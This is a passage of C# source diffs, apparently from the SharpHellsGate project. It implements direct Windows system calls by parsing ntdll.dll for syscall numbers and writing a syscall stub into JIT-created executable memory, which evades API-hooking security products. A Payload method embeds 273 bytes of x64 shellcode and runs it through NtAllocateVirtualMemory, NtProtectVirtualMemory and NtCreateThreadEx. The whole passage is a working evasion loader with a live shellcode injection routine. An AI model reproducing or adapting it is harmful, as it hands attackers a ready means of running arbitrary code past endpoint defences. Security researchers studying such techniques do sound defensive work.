|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Inject in memory a basic system call stub and return a delegate for execution via un-managed code.
|
||||
/// </summary>
|
||||
/// <typeparam name="T">The desired delegate Type.</typeparam>
|
||||
/// <param name="syscall">The system call to execute.</param>
|
||||
/// <returns>A delegate of to execute the system call.</returns>
|
||||
private T NtInvocation<T>(Int16 syscall) where T: Delegate {
|
||||
if (!this.IsGateReady || this.UnmanagedMethodAddress == IntPtr.Zero) {
|
||||
Util.LogError("Unable to inject system call stub");
|
||||
return default;
|
||||
}
|
||||
|
||||
Span<byte> stub = stackalloc byte[24] {
|
||||
0x4c, 0x8b, 0xd1, // mov r10, rcx
|
||||
0xb8, (byte)syscall, (byte)(syscall >> 8), 0x00, 0x00, // mov eax, <syscall
|
||||
0xf6, 0x04, 0x25, 0x08, 0x03, 0xfe, 0x7f, 0x01, // test byte ptr [SharedUserData+0x308],1
|
||||
0x75, 0x03, // jne ntdll!<function>+0x15
|
||||
0x0f, 0x05, // syscall
|
||||
0xc3, // ret
|
||||
0xcd, 0x2e, // int 2Eh
|
||||
0xc3 // ret
|
||||
};
|
||||
|
||||
Marshal.Copy(stub.ToArray(), 0, this.UnmanagedMethodAddress, stub.Length);
|
||||
return Marshal.GetDelegateForFunctionPointer<T>(this.UnmanagedMethodAddress);
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Managed wrapper around the NtAllocateVirtualMemory native Windows function
|
||||
/// </summary>
|
||||
/// <param name="ProcessHandle">A handle for the process for which the mapping should be done.</param>
|
||||
/// <param name="BaseAddress">A pointer to a variable that will receive the base address of the allocated region of pages.</param>
|
||||
/// <param name="ZeroBits">The number of high-order address bits that must be zero in the base address of the section view.</param>
|
||||
/// <param name="RegionSize">A pointer to a variable that will receive the actual size, in bytes, of the allocated region of pages.</param>
|
||||
/// <param name="AllocationType">A bitmask containing flags that specify the type of allocation to be performed for the specified region of pages.</param>
|
||||
/// <param name="Protect">A bitmask containing page protection flags that specify the protection desired for the committed region of pages.</param>
|
||||
/// <returns>NtAllocateVirtualMemory returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
private UInt32 NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize, UInt32 AllocationType, UInt32 Protect) {
|
||||
lock (this.Mutant) {
|
||||
Int16 syscall = this.APITable[Util.NtAllocateVirtualMemoryHash].Syscall;
|
||||
if (syscall == 0x0000)
|
||||
return Macros.STATUS_UNSUCCESSFUL;
|
||||
|
||||
DFunctions.NtAllocateVirtualMemory Func = NtInvocation<DFunctions.NtAllocateVirtualMemory>(syscall);
|
||||
return Func(ProcessHandle, ref BaseAddress, ZeroBits, ref RegionSize, AllocationType, Protect);
|
||||
}
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Managed wrapper around the NtProtectVirtualMemory native Windows function.
|
||||
/// </summary>
|
||||
/// <param name="ProcessHandle">Handle to Process Object opened with PROCESS_VM_OPERATION access.</param>
|
||||
/// <param name="BaseAddress">Pointer to base address to protect. Protection will change on all page containing specified address. On output, BaseAddress will point to page start address.</param>
|
||||
/// <param name="NumberOfBytesToProtect">Pointer to size of region to protect. On output will be round to page size (4KB).</param>
|
||||
/// <param name="NewAccessProtection">One or some of PAGE_... attributes.</param>
|
||||
/// <param name="OldAccessProtection">Receive previous protection.</param>
|
||||
/// <returns>NtProtectVirtualMemory returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
private UInt32 NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr NumberOfBytesToProtect, UInt32 NewAccessProtection, ref UInt32 OldAccessProtection) {
|
||||
lock (this.Mutant) {
|
||||
Int16 syscall = this.APITable[Util.NtProtectVirtualMemoryHash].Syscall;
|
||||
if (syscall == 0x0000)
|
||||
return Macros.STATUS_UNSUCCESSFUL;
|
||||
|
||||
DFunctions.NtProtectVirtualMemory Func = NtInvocation<DFunctions.NtProtectVirtualMemory>(syscall);
|
||||
return Func(ProcessHandle, ref BaseAddress, ref NumberOfBytesToProtect, NewAccessProtection, out OldAccessProtection);
|
||||
}
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Managed wrapper around the NtCreateThreadEx native Windows function.
|
||||
/// </summary>
|
||||
/// <param name="hThread">Caller supplied storage for the resulting handle.</param>
|
||||
/// <param name="DesiredAccess">Specifies the allowed or desired access to the thread.</param>
|
||||
/// <param name="ObjectAttributes">Initialized attributes for the object.</param>
|
||||
/// <param name="ProcessHandle">Handle to the threads parent process.</param>
|
||||
/// <param name="lpStartAddress">Address of the function to execute.</param>
|
||||
/// <param name="lpParameter">Parameters to pass to the function.</param>
|
||||
/// <param name="CreateSuspended">Whether the thread will be in suspended mode and has to be resumed later.</param>
|
||||
/// <param name="StackZeroBits"></param>
|
||||
/// <param name="SizeOfStackCommit">Initial stack memory to commit.</param>
|
||||
/// <param name="SizeOfStackReserve">Initial stack memory to reserve.</param>
|
||||
/// <param name="lpBytesBuffer"></param>
|
||||
/// <returns>NtCreateThreadEx returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
private UInt32 NtCreateThreadEx(ref IntPtr hThread, uint DesiredAccess, IntPtr ObjectAttributes, IntPtr ProcessHandle, IntPtr lpStartAddress, IntPtr lpParameter, bool CreateSuspended, uint StackZeroBits, uint SizeOfStackCommit, uint SizeOfStackReserve, IntPtr lpBytesBuffer) {
|
||||
lock (this.Mutant) {
|
||||
Int16 syscall = this.APITable[Util.NtCreateThreadExHash].Syscall;
|
||||
if (syscall == 0x0000)
|
||||
return Macros.STATUS_UNSUCCESSFUL;
|
||||
|
||||
DFunctions.NtCreateThreadEx Func = NtInvocation<DFunctions.NtCreateThreadEx>(syscall);
|
||||
return Func(ref hThread, DesiredAccess, ObjectAttributes, ProcessHandle, lpStartAddress, lpParameter, CreateSuspended, StackZeroBits, SizeOfStackCommit, SizeOfStackReserve, lpBytesBuffer);
|
||||
}
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Managed wrapper around the NtWaitForSingleObject native Windows function.
|
||||
/// </summary>
|
||||
/// <param name="ObjectHandle">Open handle to a alertable executive object.</param>
|
||||
/// <param name="Alertable">If set, calling thread is signaled, so all queued APC routines are executed.</param>
|
||||
/// <param name="TimeOuts">Time-out interval, in microseconds. NULL means infinite.</param>
|
||||
/// <returns>NtWaitForSingleObject returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
private UInt32 NtWaitForSingleObject(IntPtr ObjectHandle, bool Alertable, ref Structures.LARGE_INTEGER TimeOuts) {
|
||||
lock (this.Mutant) {
|
||||
Int16 syscall = this.APITable[Util.NtWaitForSingleObjectHash].Syscall;
|
||||
if (syscall == 0x0000)
|
||||
return Macros.STATUS_UNSUCCESSFUL;
|
||||
|
||||
DFunctions.NtWaitForSingleObject Func = NtInvocation<DFunctions.NtWaitForSingleObject>(syscall);
|
||||
return Func(ObjectHandle, Alertable, ref TimeOuts);
|
||||
}
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// .ctor
|
||||
/// </summary>
|
||||
/// <param name="Table">The API table that will be used by the multiple function wrapers.</param>
|
||||
public HellsGate(Dictionary<UInt64, Util.APITableEntry> Table) {
|
||||
this.APITable = Table;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// JIT a static method to generate RWX memory segment.
|
||||
/// </summary>
|
||||
/// <returns>Whether the memory segment was successfully generated.</returns>
|
||||
public bool GenerateRWXMemorySegment() {
|
||||
// Find and JIT the method
|
||||
MethodInfo method = typeof(HellsGate).GetMethod(nameof(Gate), BindingFlags.Static | BindingFlags.NonPublic);
|
||||
if (method == null) {
|
||||
Util.LogError("Unable to find the method");
|
||||
return false;
|
||||
}
|
||||
RuntimeHelpers.PrepareMethod(method.MethodHandle);
|
||||
|
||||
// Get the address of the function and check if first opcode == JMP
|
||||
IntPtr pMethod = method.MethodHandle.GetFunctionPointer();
|
||||
if (Marshal.ReadByte(pMethod) != 0xe9) {
|
||||
Util.LogError("Method was not JIT'ed or invalid stub");
|
||||
return false;
|
||||
}
|
||||
Util.LogInfo($"Managed method address: 0x{pMethod:x16}");
|
||||
|
||||
// Get address of jited method and stack alignment
|
||||
Int32 offset = Marshal.ReadInt32(pMethod, 1);
|
||||
UInt64 addr = (UInt64)pMethod + (UInt64)offset;
|
||||
while (addr % 16 != 0)
|
||||
addr++;
|
||||
Util.LogInfo($"Unmanaged method address: 0x{addr:x16}\n");
|
||||
|
||||
this.MangedMethodAddress = method.MethodHandle.GetFunctionPointer();
|
||||
this.UnmanagedMethodAddress = (IntPtr)addr;
|
||||
this.IsGateReady = true;
|
||||
return true;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Payload example. In this case this is a basic shellcode self-injection.
|
||||
/// </summary>
|
||||
public void Payload() {
|
||||
if (!this.IsGateReady) {
|
||||
if (!this.GenerateRWXMemorySegment()) {
|
||||
Util.LogError("Unable to generate RX memory segment");
|
||||
return;
|
||||
}
|
||||
}
|
||||
|
||||
byte[] shellcode = new byte[273] {
|
||||
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
|
||||
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
|
||||
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
|
||||
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
|
||||
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
|
||||
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
|
||||
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
|
||||
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
|
||||
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
|
||||
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
|
||||
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
|
||||
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
|
||||
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
|
||||
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
|
||||
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
|
||||
0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
|
||||
0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
|
||||
0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
|
||||
0x63,0x00,0xc3
|
||||
};
|
||||
Util.LogInfo($"Shellcode size: {shellcode.Length} bytes");
|
||||
|
||||
// Allocate Memory
|
||||
IntPtr pBaseAddres = IntPtr.Zero;
|
||||
IntPtr Region = (IntPtr)shellcode.Length;
|
||||
UInt32 ntstatus = NtAllocateVirtualMemory(Macros.GetCurrentProcess(), ref pBaseAddres, IntPtr.Zero, ref Region, Macros.MEM_COMMIT | Macros.MEM_RESERVE, Macros.PAGE_READWRITE);
|
||||
if (!Macros.NT_SUCCESS(ntstatus)) {
|
||||
Util.LogError($"Error ntdll!NtAllocateVirtualMemory (0x{ntstatus:0x8})");
|
||||
return;
|
||||
}
|
||||
Util.LogInfo($"Page address: 0x{pBaseAddres:x16}");
|
||||
|
||||
// Copy Memory
|
||||
Marshal.Copy(shellcode, 0, pBaseAddres, shellcode.Length);
|
||||
Array.Clear(shellcode, 0, shellcode.Length);
|
||||
|
||||
// Change memory protection
|
||||
UInt32 OldAccessProtection = 0;
|
||||
ntstatus = NtProtectVirtualMemory(Macros.GetCurrentProcess(), ref pBaseAddres, ref Region, Macros.PAGE_EXECUTE_READ, ref OldAccessProtection);
|
||||
if (!Macros.NT_SUCCESS(ntstatus) || OldAccessProtection != 0x0004) {
|
||||
Util.LogError($"Error ntdll!NtProtectVirtualMemory (0x{ntstatus:0x8})");
|
||||
return;
|
||||
}
|
||||
|
||||
IntPtr hThread = IntPtr.Zero;
|
||||
ntstatus = NtCreateThreadEx(ref hThread, 0x1FFFFF, IntPtr.Zero, Macros.GetCurrentProcess(), pBaseAddres, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);
|
||||
if (!Macros.NT_SUCCESS(ntstatus) || hThread == IntPtr.Zero) {
|
||||
Util.LogError($"Error ntdll!NtCreateThreadEx (0x{ntstatus:0x8})");
|
||||
return;
|
||||
}
|
||||
Util.LogInfo($"Thread handle: 0x{hThread:x16}\n");
|
||||
|
||||
// Wait for one second
|
||||
Structures.LARGE_INTEGER TimeOut = new Structures.LARGE_INTEGER();
|
||||
TimeOut.QuadPart = -10000000;
|
||||
ntstatus = NtWaitForSingleObject(hThread, false, ref TimeOut);
|
||||
if (ntstatus != 0x00) {
|
||||
Util.LogError($"Error ntdll!NtWaitForSingleObject (0x{ntstatus:0x8})");
|
||||
return;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,142 @@
|
|||
using System;
|
||||
using System.IO;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
|
||||
namespace SharpHellsGate.Module {
|
||||
/// <summary>
|
||||
/// Used to manipulate and extract information from a memory stream.
|
||||
/// In this case the memory stream is the NTDLL module.
|
||||
/// </summary>
|
||||
public class MemoryUtil : IDisposable {
|
||||
|
||||
/// <summary>
|
||||
/// The memory stream representation of the NTDLL module.
|
||||
/// </summary>
|
||||
protected Stream ModuleStream { get; set; }
|
||||
|
||||
/// <summary>
|
||||
/// Dispose the memory stream when no longer needed.
|
||||
/// </summary>
|
||||
~MemoryUtil() => Dispose();
|
||||
|
||||
/// <summary>
|
||||
/// Dispose the memory stream when no longer needed.
|
||||
/// </summary>
|
||||
public void Dispose() {
|
||||
this.ModuleStream.Dispose();
|
||||
this.ModuleStream.Close();
|
||||
GC.SuppressFinalize(this);
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Extract a structure from the memory stream.
|
||||
/// </summary>
|
||||
/// <typeparam name="T">The Type of the structure to extract.</typeparam>
|
||||
/// <param name="offset">The offset in the memory stream where the structure is located.</param>
|
||||
/// <returns>The structure populated or the default structure.</returns>
|
||||
protected T GetStructureFromBlob<T>(Int64 offset) where T : struct {
|
||||
Span<byte> bytes = this.GetStructureBytesFromOffset<T>(offset);
|
||||
if (Marshal.SizeOf<T>() != bytes.Length)
|
||||
return default;
|
||||
|
||||
IntPtr ptr = Marshal.AllocHGlobal(Marshal.SizeOf<T>());
|
||||
Marshal.Copy(bytes.ToArray(), 0, ptr, bytes.Length);
|
||||
T s = Marshal.PtrToStructure<T>(ptr);
|
||||
|
||||
Marshal.FreeHGlobal(ptr);
|
||||
return s;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Extract the code from a native Windows function.
|
||||
/// </summary>
|
||||
/// <param name="offset">The location of the function in the memory stream.</param>
|
||||
/// <returns>The 24 bytes representing the code of the function.</returns>
|
||||
protected Span<byte> GetFunctionOpCode(Int64 offset) {
|
||||
Span<byte> s = stackalloc byte[24];
|
||||
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||
this.ModuleStream.Read(s);
|
||||
return s.ToArray();
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Extract a DWORD value from the memory stream.
|
||||
/// </summary>
|
||||
/// <param name="offset">The location of the DWORD in the memory stream.</param>
|
||||
/// <returns>The value of the DWORD.</returns>
|
||||
protected UInt32 ReadPtr32(Int64 offset) {
|
||||
Span<byte> s = stackalloc byte[4];
|
||||
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||
this.ModuleStream.Read(s);
|
||||
return BitConverter.ToUInt32(s);
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Extract a QWORD value from the memory stream.
|
||||
/// </summary>
|
||||
/// <param name="offset">The location of the QWORD in the memory stream.</param>
|
||||
/// <returns>The value of the QWORD.</returns>
|
||||
protected UInt64 ReadPtr64(Int64 offset) {
|
||||
Span<byte> s = stackalloc byte[8];
|
||||
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||
this.ModuleStream.Read(s);
|
||||
return BitConverter.ToUInt64(s);
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Extract a WORD value from the memory stream.
|
||||
/// </summary>
|
||||
/// <param name="offset">The location of the WORD in the memory stream.</param>
|
||||
/// <returns>The value of the WORD.</returns>
|
||||
protected UInt16 ReadUShort(Int64 offset) {
|
||||
Span<byte> s = stackalloc byte[2];
|
||||
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||
this.ModuleStream.Read(s);
|
||||
return BitConverter.ToUInt16(s);
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Extract an ASCII string from the memory stream.
|
||||
/// </summary>
|
||||
/// <param name="offset">The location of the ASCII string in the memory stream.</param>
|
||||
/// <returns>The ASCII string.</returns>
|
||||
protected string ReadAscii(Int64 offset) {
|
||||
int length = 0;
|
||||
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||
while (this.ModuleStream.ReadByte() != 0x00)
|
||||
length++;
|
||||
|
||||
Span<byte> s = length <= 1024 ? stackalloc byte[length] : new byte[length];
|
||||
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||
this.ModuleStream.Read(s);
|
||||
return Encoding.ASCII.GetString(s);
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Extract the byte representation of a structure from the memory stream.
|
||||
/// </summary>
|
||||
/// <typeparam name="T">The Type of the structure to extract from the memory stream.</typeparam>
|
||||
/// <param name="offset">The location of the structure in the memory stream.</param>
|
||||
/// <returns>The structure as byte span.</returns>
|
||||
protected Span<byte> GetStructureBytesFromOffset<T>(Int64 offset) where T : struct {
|
||||
Span<byte> s = stackalloc byte[Marshal.SizeOf<T>()];
|
||||
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||
this.ModuleStream.Read(s);
|
||||
return s.ToArray();
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get a specific amount of bytes at a specific location in the memory stream.
|
||||
/// </summary>
|
||||
/// <param name="offset">The location of the bytes to extract from the memory stream.</param>
|
||||
/// <param name="size">The number of bytes to extract from the memory stream at a give location.</param>
|
||||
/// <returns>The desired bytes as a byte span.</returns>
|
||||
protected Span<byte> GetBytesFromOffset(Int64 offset, int size) {
|
||||
Span<byte> s = size >= 1024 ? new byte[size] : stackalloc byte[size];
|
||||
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||
this.ModuleStream.Read(s);
|
||||
return s.ToArray();
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,328 @@
|
|||
using System;
|
||||
using System.IO;
|
||||
using SharpHellsGate.Win32;
|
||||
using System.Collections.Generic;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Linq;
|
||||
|
||||
namespace SharpHellsGate.Module {
|
||||
|
||||
/// <summary>
|
||||
/// Wrapper around the NTDLL module.
|
||||
/// Used to extract structures and find system calls.
|
||||
/// </summary>
|
||||
public class SystemModule : MemoryUtil {
|
||||
|
||||
/// <summary>
|
||||
/// IMAGE_DOS_HEADER structure of the NTDLL module.
|
||||
/// </summary>
|
||||
public Structures.IMAGE_DOS_HEADER ModuleDOSHeader { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// IMAGE_NT_HEADERS64 structure of the NTDLL module.
|
||||
/// </summary>
|
||||
public Structures.IMAGE_NT_HEADERS64 ModuleNTHeaders { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// IMAGE_SECTION_HEADER structure from the NTDLL module.
|
||||
/// </summary>
|
||||
public List<Structures.IMAGE_SECTION_HEADER> ModuleSectionHeaders { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// IMAGE_EXPORT_DIRECTORY structure from the NTDLL module.
|
||||
/// </summary>
|
||||
public Structures.IMAGE_EXPORT_DIRECTORY ModuleExportDirectory { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// Location in the memory stream of the IMAGE_EXPORT_DIRECTORY structure.
|
||||
/// </summary>
|
||||
public Int64 ModuleExportDirectoryOffset { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// Location in the memory stream of the exported functions' name.
|
||||
/// </summary>
|
||||
public Int64 ModuleExportDirectoryAddressNamesOffset { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// Location in the memory stream of the exported functions' address.
|
||||
/// </summary>
|
||||
public Int64 ModuleExportDirectoryAddressFunctionsOffset { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// Location in the memory stream of the exported functions' ordinal.
|
||||
/// </summary>
|
||||
public Int64 ModuleExportDirectoryAddressNameOrdinalesOffset { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// Name of the module. Will be NTDLL.
|
||||
/// </summary>
|
||||
public string ModuleName { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// Path of the module. Will be %WINDIR%\System32\ntdll.dll
|
||||
/// </summary>
|
||||
public string ModulePath { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// .ctor
|
||||
/// </summary>
|
||||
/// <param name="name">Name of the module</param>
|
||||
public SystemModule(string name) : base() {
|
||||
this.ModuleName = name;
|
||||
this.ModulePath = $"{Environment.SystemDirectory}\\{name}";
|
||||
this.ModuleSectionHeaders = new List<Structures.IMAGE_SECTION_HEADER>() { };
|
||||
|
||||
this.LoadModule();
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Load the module into a memory stream.
|
||||
/// </summary>
|
||||
/// <returns>Whether the loading process was a success.</returns>
|
||||
public bool LoadModule() {
|
||||
if (string.IsNullOrEmpty(this.ModuleName)) {
|
||||
Util.LogError("Module name not provided");
|
||||
return false;
|
||||
}
|
||||
|
||||
if (!File.Exists(this.ModulePath)) {
|
||||
Util.LogError($"Unable to find module: {this.ModuleName}");
|
||||
return false;
|
||||
}
|
||||
|
||||
ReadOnlySpan<byte> ModuleBlob = File.ReadAllBytes(this.ModulePath);
|
||||
if (ModuleBlob.Length == 0x00) {
|
||||
Util.LogError($"Empty module content: {this.ModuleName}");
|
||||
return false;
|
||||
}
|
||||
|
||||
base.ModuleStream = new MemoryStream(ModuleBlob.ToArray());
|
||||
return true;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Reload all structures.
|
||||
/// </summary>
|
||||
/// <returns>Whether all structures were successfully reloaded.</returns>
|
||||
public bool LoadAllStructures() {
|
||||
if (this.GetModuleDOSHeader(true).Equals(default(Structures.IMAGE_DOS_HEADER)))
|
||||
return false;
|
||||
|
||||
if (this.GetModuleNTHeaders(true).Equals(default(Structures.IMAGE_NT_HEADERS64)))
|
||||
return false;
|
||||
|
||||
if (this.GetModuleSectionHeaders(true).Count != this.ModuleNTHeaders.FileHeader.NumberOfSections)
|
||||
return false;
|
||||
|
||||
if (this.GetModuleExportDirectory(true).Equals(default(Structures.IMAGE_EXPORT_DIRECTORY)))
|
||||
return false;
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get the _IMAGE_DOS_HEADERstructure from the module.
|
||||
/// </summary>
|
||||
/// <param name="ReloadCache">Whether the data has to re-processed if not already cached.</param>
|
||||
/// <returns>The IMAGE_NT_HEADERS64 structure of the module.</returns>
|
||||
public Structures.IMAGE_DOS_HEADER GetModuleDOSHeader(bool ReloadCache = false) {
|
||||
if (!this.ModuleDOSHeader.Equals(default(Structures.IMAGE_DOS_HEADER)) && !ReloadCache)
|
||||
return this.ModuleDOSHeader;
|
||||
|
||||
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||
Util.LogError("Module not loaded");
|
||||
return default;
|
||||
}
|
||||
|
||||
this.ModuleDOSHeader = base.GetStructureFromBlob<Structures.IMAGE_DOS_HEADER>(0);
|
||||
if (this.ModuleDOSHeader.e_magic != Macros.IMAGE_DOS_SIGNATURE) {
|
||||
Util.LogError("Invalid DOS header signature");
|
||||
return default;
|
||||
}
|
||||
|
||||
return this.ModuleDOSHeader;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get the IMAGE_NT_HEADERS64 structure from the module.
|
||||
/// </summary>
|
||||
/// <param name="ReloadCache">Whether the data has to re-processed if not already cached.</param>
|
||||
/// <returns>The IMAGE_NT_HEADERS64 structure of the module.</returns>
|
||||
public Structures.IMAGE_NT_HEADERS64 GetModuleNTHeaders(bool ReloadCache = false) {
|
||||
if (!this.ModuleNTHeaders.Equals(default(Structures.IMAGE_NT_HEADERS64)) && !ReloadCache)
|
||||
return this.ModuleNTHeaders;
|
||||
|
||||
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||
Util.LogError("Module not loaded");
|
||||
return default;
|
||||
}
|
||||
|
||||
if (this.ModuleDOSHeader.Equals(default(Structures.IMAGE_DOS_HEADER)))
|
||||
this.GetModuleDOSHeader();
|
||||
|
||||
this.ModuleNTHeaders = base.GetStructureFromBlob<Structures.IMAGE_NT_HEADERS64>(this.ModuleDOSHeader.e_lfanew);
|
||||
if (this.ModuleNTHeaders.Signature != Macros.IMAGE_NT_SIGNATURE) {
|
||||
Util.LogError("Invalid NT headers signature");
|
||||
return default;
|
||||
}
|
||||
|
||||
return this.ModuleNTHeaders;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get list of _IMAGE_SECTION_HEADER structures from the module.
|
||||
/// </summary>
|
||||
/// <param name="ReloadCache">Whether the data has to re-processed if not already cached.</param>
|
||||
/// <returns>The list of _IMAGE_SECTION_HEADER structures.</returns>
|
||||
public List<Structures.IMAGE_SECTION_HEADER> GetModuleSectionHeaders(bool ReloadCache = false) {
|
||||
if (this.ModuleSectionHeaders.Count == this.ModuleNTHeaders.FileHeader.NumberOfSections && !ReloadCache)
|
||||
return this.ModuleSectionHeaders;
|
||||
|
||||
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||
Util.LogError("Module not loaded");
|
||||
return default;
|
||||
}
|
||||
|
||||
if (this.ModuleNTHeaders.Equals(default(Structures.IMAGE_NT_HEADERS64)) || this.ModuleNTHeaders.FileHeader.Equals(default(Structures.IMAGE_FILE_HEADER)))
|
||||
this.GetModuleNTHeaders();
|
||||
|
||||
for (Int16 cx = 0; cx < this.ModuleNTHeaders.FileHeader.NumberOfSections; cx++) {
|
||||
Int64 iSectionOffset = this.GetModuleSectionOffset(cx);
|
||||
|
||||
Structures.IMAGE_SECTION_HEADER ImageSection = base.GetStructureFromBlob<Structures.IMAGE_SECTION_HEADER>(iSectionOffset);
|
||||
if (!ImageSection.Equals(default(Structures.IMAGE_SECTION_HEADER)))
|
||||
this.ModuleSectionHeaders.Add(ImageSection);
|
||||
}
|
||||
|
||||
return this.ModuleSectionHeaders;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get a _IMAGE_SECTION_HEADER structure by name.
|
||||
/// </summary>
|
||||
/// <param name="name">The name of the section.</param>
|
||||
/// <returns>The _IMAGE_SECTION_HEADER structure if exists.</returns>
|
||||
public Structures.IMAGE_SECTION_HEADER GetModuleSectionHeaderByName(string name) {
|
||||
if (name.Length > 8) {
|
||||
Util.LogError("Invalid section name");
|
||||
return default;
|
||||
}
|
||||
|
||||
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||
Util.LogError("Module not loaded");
|
||||
return default;
|
||||
}
|
||||
|
||||
if (this.ModuleSectionHeaders.Count == 0x00)
|
||||
this.GetModuleSectionHeaders();
|
||||
|
||||
return this.ModuleSectionHeaders.Where(x => x.Name.Equals(name, StringComparison.OrdinalIgnoreCase)).FirstOrDefault();
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get the Export Address Table (aka EAT) from the module.
|
||||
/// </summary>
|
||||
/// <param name="ReloadCache">Whether the data has to re-processed if not already cached.</param>
|
||||
/// <returns>the _IMAGE_EXPORT_DIRECTORY structure</returns>
|
||||
public Structures.IMAGE_EXPORT_DIRECTORY GetModuleExportDirectory(bool ReloadCache = false) {
|
||||
if (!this.ModuleExportDirectory.Equals(default(Structures.IMAGE_EXPORT_DIRECTORY)) && !ReloadCache)
|
||||
return this.ModuleExportDirectory;
|
||||
|
||||
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||
Util.LogError("Module not loaded");
|
||||
return default;
|
||||
}
|
||||
|
||||
if (this.ModuleNTHeaders.Equals(default(Structures.IMAGE_NT_HEADERS64)))
|
||||
this.GetModuleNTHeaders();
|
||||
|
||||
if (this.ModuleSectionHeaders.Count == 0x00)
|
||||
this.GetModuleSectionHeaders();
|
||||
|
||||
